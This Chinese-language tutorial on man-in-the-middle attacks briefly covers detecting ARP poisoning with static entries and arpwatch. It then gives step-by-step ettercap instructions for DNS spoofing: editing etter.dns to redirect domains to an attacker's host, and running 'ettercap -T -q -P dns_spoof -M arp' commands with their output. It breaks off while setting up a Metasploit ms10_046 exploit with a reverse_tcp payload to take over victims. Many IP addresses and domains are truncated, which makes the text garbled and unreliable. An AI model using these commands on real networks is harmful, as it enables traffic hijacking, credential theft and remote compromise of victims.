中間人攻擊之DNS欺騙

1、中間人攻擊-DNS欺騙在前面的文章（中間人攻擊-ARP毒化）中，我們討論了黑客危險的攻擊和實用的ARP中毒原理。在本文中，我將首先探討檢測和防止ARP中毒（或ARP欺騙）攻擊，然后我將回顧其他的中間人攻擊-DNS欺騙。ARP緩存攻擊是一項非常危險的攻擊，重要的是在用戶中創(chuàng)建安全的意識和分析有效的工具和策略。如果你操作的是小型網(wǎng)絡(luò)，那么就很容易維護ARP。但是在大型的網(wǎng)絡(luò)，維護ARP是很困難和費事的。在前一篇文章的最后我們討論了工具和技術(shù)，能夠被用來檢測ARP緩存中毒攻擊。讓我們來回顧下每一步:  靜態(tài)ARP你可以在網(wǎng)絡(luò)ARP表中手動的添加一些信息，一旦信息插入，你就有了靜態(tài)

2、ARP映射。輸入數(shù)據(jù)的過程也是非常簡單，在你的終端/CMS中，只需輸入：“arp -s”例子：你現(xiàn)在的ARP表：rootbt:# arpAddress HWtype HWaddress Flags Mask Iface ether 00:22:93:cf:eb:6d C eth0讓我們假設(shè)一下，我想添加一個新的主機在我的ARP緩存表中，我輸入如下命令：arp -s IP MACrootbt:# arp -s 00:50:FC:A8:36:F5rootbt:# arpAddress HWtype HWaddress Flags Mask Iface1

3、 ether 00:50:fc:a8:36:f5 CM eth0 ether 00:22:93:cf:eb:6d C eth0rootbt:#需要注意的是，手動添加ARP表只適用于當(dāng)前的會話。當(dāng)你重新啟動計算機，將更新表。如果你想要使用這種方法，那么你可以創(chuàng)建一個批處理文件/BASH文件，并將它們添加到啟動項。ARPwatch(ps：監(jiān)聽ARP記錄)這是一個不錯的實用程序，已經(jīng)被用來監(jiān)測ARP網(wǎng)絡(luò)，它能夠探測并記錄發(fā)生更改的網(wǎng)絡(luò)，同時還發(fā)送郵箱詳細說明各自的變化。安裝過程也是非常簡單的。對于Ubuntu用戶：# apt-get install arpw

4、atchrootbt:# arpwatch -hVersion 2.1a15usage: arpwatch -dN -f datafile -i interface -n net/width -r file -s sendmail_path -p -a -m addr -u username -R seconds  -Q -z ignorenet/ignoremask如果需要快速檢測就用下面這個命令：# arpwatch -i interface rootbt:# arpwa

5、tch -i eth0檢查程序是否在運行：rootbt:# ps -ef | grep arpwatcharpwatch 1041 1 0 14:05 ? 00:00:00 /usr/sbin/arpwatch -u arpwatch -N -proot 2191 2165 0 14:54 pts/0 00:00:00 grep color=auto arpwatch接下來的步驟就是ARPwatch記錄日志，這也非常簡單，你只需要做得是確定目錄，然后讀取文件。rootbt:# cd /var/lib/arpwatchrootbt:/var/lib/arpwatch

6、# lsarp.dat arp.dat-rootbt:/var/lib/arpwatch# cat arp.dat00:50:fc:a8:36:f5       1337437776        eth000:27:0e:21:a6:1e       1337437923        eth0所以如果你是網(wǎng)絡(luò)管理員，那么你應(yīng)該實施一些策略來監(jiān)視A

7、RP表并且保護主機免受ARP中毒攻擊。當(dāng)然我們要注意，中間人攻擊并不局限于一個ARP欺騙攻擊。正如前面提到的，還有許多其他的技術(shù)能夠執(zhí)行一個中間人攻擊。一個主要的例子就是DNS欺騙，我們將分析它。DNS欺騙攻擊DNS欺騙攻擊是一種非常危險的中間人攻擊，它容易被攻擊者利用并且竊取用戶的機密信息。雖然這篇文章可以提供一些新的見解，但重要的是DNS欺騙是一個一般概念，有無數(shù)種方法可以實現(xiàn)一個DNS欺騙攻擊。在一個DNS欺騙攻擊中，攻擊者可以利用一個漏洞來偽造網(wǎng)絡(luò)流量。因此，要理解DNS欺騙攻擊，必須理解DNS是怎樣工作的。DNS(域名系統(tǒng))在互聯(lián)網(wǎng)中是一個非常重要的協(xié)議。它屬于TCP/IP，是一個分

8、層結(jié)構(gòu)的分布式模塊，它包含域名的相關(guān)信息。它負責(zé)在網(wǎng)絡(luò)上映射域名到他們各自的IP上。DNS定位主機/服務(wù)器通過查看友好域名，使用域名系統(tǒng)，DNS將域名和IP地址相互映射 。這些設(shè)備（路由器、服務(wù)器等）連接到你的電腦不能理解一些友好的名稱 （),他們只了解一個IP地址，而DNS負責(zé)翻譯它。讓我們來看看下面這個圖來理解主機和本地DNS服務(wù)器的正常通信。DNS服務(wù)器包含著一個主數(shù)據(jù)庫，其中包括信息的IP地址，因為這涉及到相應(yīng)的域名。所以在這些正常的通信中，一個主機發(fā)送請求到服務(wù)器，之后服務(wù)器響應(yīng)正確的信息。如果DNS沒有信息傳入的請求，它將發(fā)送請求到外部DNS服務(wù)器來獲取正確的響

9、應(yīng)。那么攻擊者如何使用中間人攻擊來實施DNS欺騙呢？下圖說明了答案：使用DNS欺騙中間人攻擊，攻擊者將截取會話，然后轉(zhuǎn)移到一個假網(wǎng)站的會話。假如：用戶希望訪問，并且谷歌的IP地址為7，攻擊者就可以使用DNS欺騙技術(shù)攔截會話，并將用戶重定向到假冒的網(wǎng)站，假網(wǎng)站IP可以為任意IP。演示DNS欺騙攻擊在本系列的以前文章中我發(fā)現(xiàn)ettercap是一個很好用來演示ARP欺騙攻擊的工具。當(dāng)然ettercap包含一個DNS插件，非常容易使用哦。打開ettercap GUI，點擊"sniff"，之后再"unified sniffing"選擇自己的

10、網(wǎng)絡(luò)。單機hosts，之后掃描整個子網(wǎng)存活的主機。在執(zhí)行時，我們來編輯etter.dns文件，以確保它執(zhí)行正確的DNS欺騙攻擊：microsoft sucks ;)# redirect it to # A 6* A 6 PTR 6 # Wildcards in PTR are not allowed默認情況下，ettercap是重定向到另一個網(wǎng)站的IP地址，我們來改變它： A 2* A 2 PTR 2 # Wildcards

11、in PTR are not allowed2是攻擊者的IP地址。確保Web服務(wù)器運行在攻擊者的機器，一定要啟用IP轉(zhuǎn)發(fā)。 在受害者的電腦查看：C:>ping Pinging 01 with 32 bytes of data:Reply from 0: bytes=32 time=167ms TTL=54>Reply from 0: bytes=32 time=167ms TTL=54Reply from 0: bytes=32 time=167ms TTL=54Ping

12、 statistics for 0Packets: Sent = 4, Received = 4, Lost = 0 <0% loss>,在ettercap GUI上，選擇受害者主機（目標(biāo)1）和默認路由器（網(wǎng)關(guān),目標(biāo)2）。點擊Mitm-ARP poisoning，選擇"Sniff remote connerctions."之后點擊 "start"-"start sniffing"點擊選擇"plugins"-"manage the plugins"

13、0;在其中選擇dns_spoof。這將會啟用dns_spoof插件來執(zhí)行DNS欺騙中間人攻擊?，F(xiàn)在在受害者電腦的DNS欺騙攻擊是：你可以看到，在DNS已經(jīng)成功欺騙時，所有會話被轉(zhuǎn)移到了攻擊者的主機，而不是真正的微軟服務(wù)器。這個演示是基于GUI的ettercap，你也可以使用命令行版本。讓我們考慮一個快速演示DNS欺騙的命令行接口。選擇etter。查看Dns使用簡單的命令：rootbt:# locate etter.dns/usr/local/share/videojak/etter.dns/usr/share/ettercap/etter.dnsrootbt:#現(xiàn)在你可以使用你喜歡的文本編輯器

14、來編輯這個文件。你可以使用文本編輯器nano或者其他任何你想要的rootbt:# gedit /usr/share/ettercap/etter.dnsrootbt:# nano /usr/share/ettercap/etter.dns當(dāng)你完成了保存這個文件，現(xiàn)在做好了準(zhǔn)備。我們需要做得就是通過ettercap啟用DNS欺騙攻擊:rootbt:# ettercap -T -q -P dns_spoof -M arp / /ettercap NG-0.7.3 copyright 2001-2004 ALoR & NaGAListening on eth0.

15、 (Ethernet)eth0 ->    00:1C:23:42:8D:04 2 SSL dissection needs a valid 'redir_command_on' script in the etter.conf filePrivileges dropped to UID 65534 GID 65534.28 plugins39 protocol dissectors53 ports monitored7587 mac vendor fingerprint1698 tc

16、p OS fingerprint2183 known servicesRandomizing 255 hosts for scanning.Scanning the whole netmask for 255 hosts.* |=>| 100.00 %4 hosts added to the hosts list.ARP poisoning victims:GROUP 1 : ANY (all the hosts in the list)GROUP 2 : ANY (all the hosts in the list)Starting Unified sniffing.Text

17、 only Interface activated.Hit 'h' for inline helpActivating dns_spoof plugin.讓我們來拆開命令結(jié)構(gòu)，來分析DNS欺騙攻擊所用到的命令：· -P  使用插件，這里我們使用的是dns_spoof· -T 使用基于文本界面· -q  啟動安靜模式（不回顯的意思）· -M 啟動ARP欺騙攻擊· / /  代表欺騙整個子網(wǎng)網(wǎng)絡(luò)此外，我們可以綜合使用這些命令。例如，你想要欺騙一個特定的受

18、害主機，那么你可以使用受害者的IP來執(zhí)行DNS欺騙攻擊。rootbt:# ettercap -T -q -P dns_spoof -M arp // /ettercap NG-0.7.3 copyright 2001-2004 ALoR & NaGAListening on eth0. (Ethernet)eth0 ->    00:1C:23:42:8D:04 2 SSL dissection needs a valid 'redi

19、r_command_on' script in the etter.conf filePrivileges dropped to UID 65534 GID 65534.28 plugins39 protocol dissectors53 ports monitored7587 mac vendor fingerprint1698 tcp OS fingerprint2183 known servicesRandomizing 255 hosts for scanning.Scanning the whole netmask for 255 hosts.* |=>| 1

20、00.00 %4 hosts added to the hosts list.ARP poisoning victims:GROUP 1 : 00:16:41:ED:6A:D0在另一個例子中，你可以使用特定的接口來執(zhí)行dns欺騙攻擊。為此，可以使用如下命令：rootbt:# ettercap -T -q -i eth0 -P dns_spoof -M arp / /DNS欺騙是一種非常危險的攻擊，因為攻擊者可以利用ettercap的dns_spoof插件和其他工具執(zhí)行攻擊。最終，攻擊者可以使用一個社會工程工具包（作者這里指的應(yīng)該是SET了）

21、來執(zhí)行攻擊去控制受害者的電腦。想象一下這是多少容易，通過社會工程工具包和DNS欺騙技術(shù)你所需要做得就是配置你的社會工程工具包和你的IP清單，制作像谷歌一樣的網(wǎng)站欺騙域名到你的IP地址上。當(dāng)受害者打開google，你的攻擊將使它訪問你的IP，之后建立一個遠程的會話。讓我們來考慮一個示例場景：下面是是metasploit 滲透工具使用ettercap進行dns欺騙。選擇你想要的exploit，在payload中我們就選擇 reverse_tcp：rootbt:# msfconsoleo 8 o o8 8 8ooYoYo. .oPYo. o8P .oPYo. .oPYo.

22、0;.oPYo. 8 .oPYo. o8 o8P8' 8 8 8oooo8 8 .oooo8 Yb. 8 8 8 8 8 8 88 8 8 8. 8 8 8 'Yb. 8 8 8 8 8 8 88 8 8 Yooo' 8 YooP8 YooP' 8YooP' 8 YooP' 8 8.:.:.:.:.:.:.:8.:.:.:.:.:8:= metasploit v3.7.0-release core:3.7 api:1.0+ - -= 684 exploits - 355 auxiliary+ - -= 217 payloads - 27 encoders - 8 nopsmsf > use windows/browser/ms10_046_shortcut_icon_dllloadermsf exploit(ms10_046_shortcut_icon_dllloader) > set SRVHOST 2SRVHOST => 2msf exploit(ms10_046_shortcut_icon_dllloader) > set PAYLOAD